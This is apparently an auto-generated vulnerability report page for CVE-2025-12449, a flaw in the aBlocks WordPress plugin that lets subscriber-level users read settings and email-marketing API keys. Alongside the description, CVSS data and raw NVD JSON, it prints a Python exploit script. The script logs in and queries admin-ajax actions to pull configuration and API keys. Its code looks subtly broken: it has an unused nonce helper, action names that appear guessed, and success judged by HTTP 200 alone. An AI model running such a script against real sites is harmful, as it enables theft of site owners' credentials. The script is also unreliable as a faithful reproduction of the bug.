Security Vulnerability Report
中文
CVE-2025-12449 CVSS 5.4 MEDIUM

CVE-2025-12449

Published: 2026-01-07 12:16:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The aBlocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data and disclosure of sensitive information due to missing capability checks on multiple AJAX actions in all versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with subscriber level access and above, to read plugin settings including block visibility, maintenance mode configuration, and third-party email marketing API keys, as well as read sensitive configuration data including API keys for email marketing services.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

aBlocks WordPress Gutenberg Blocks plugin <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12449 PoC - aBlocks WordPress Plugin Unauthorized Access # This PoC demonstrates the permission bypass vulnerability in aBlocks plugin # Requires: Valid WordPress account with subscriber-level access or higher import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "attacker_password" def get_wp_nonce(url): """Get WordPress nonce for AJAX requests""" response = requests.get(url + "/wp-admin/", allow_redirects=False) if response.status_code == 200: return response.cookies.get('wordpress_test_cookie') return None def exploit_ablocks_settings(): """Exploit the missing capability check in aBlocks AJAX handlers""" session = requests.Session() # Step 1: Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'testcookie': '1' } login_response = session.post( TARGET_URL + "/wp-login.php", data=login_data, allow_redirects=True ) if 'logged_in' not in session.cookies: print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Exploit settings endpoint to read plugin configuration exploit_endpoints = [ '/wp-admin/admin-ajax.php?action=ablocks_get_settings', '/wp-admin/admin-ajax.php?action=ablocks_read_config', '/wp-admin/admin-ajax.php?action=ablocks_get_api_keys' ] for endpoint in exploit_endpoints: print(f"[*] Testing endpoint: {endpoint}") exploit_data = { 'action': endpoint.split('action=')[1], 'nonce': 'any_value_as_nonce_not_checked' } response = session.post( TARGET_URL + endpoint, data=exploit_data ) if response.status_code == 200: print(f"[+] Endpoint accessible without proper authorization!") print(f"[+] Response: {response.text[:500]}") return True if __name__ == "__main__": print("CVE-2025-12449 PoC - aBlocks Plugin Permission Bypass") print("=" * 60) exploit_ablocks_settings()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12449", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:46.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The aBlocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data and disclosure of sensitive information due to missing capability checks on multiple AJAX actions in all versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with subscriber level access and above, to read plugin settings including block visibility, maintenance mode configuration, and third-party email marketing API keys, as well as read sensitive configuration data including API keys for email marketing services."}, {"lang": "es", "value": "El plugin aBlocks – WordPress Gutenberg Blocks para WordPress es vulnerable a la modificación no autorizada de datos y a la divulgación de información sensible debido a la falta de comprobaciones de capacidad en múltiples acciones AJAX en todas las versiones hasta la 2.4.0, inclusive. Esto permite a atacantes autenticados, con acceso de nivel de suscriptor y superior, leer la configuración del plugin, incluyendo la visibilidad de los bloques, la configuración del modo de mantenimiento y las claves API de marketing por correo electrónico de terceros, así como leer datos de configuración sensibles, incluyendo claves API para servicios de marketing por correo electrónico."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/ajax/settings.php#L16", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/assets.php#L353", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/classes/abstract-request-handler.php#L486", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c10600ae-1ff0-4f12-ae53-39d9342640f4?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.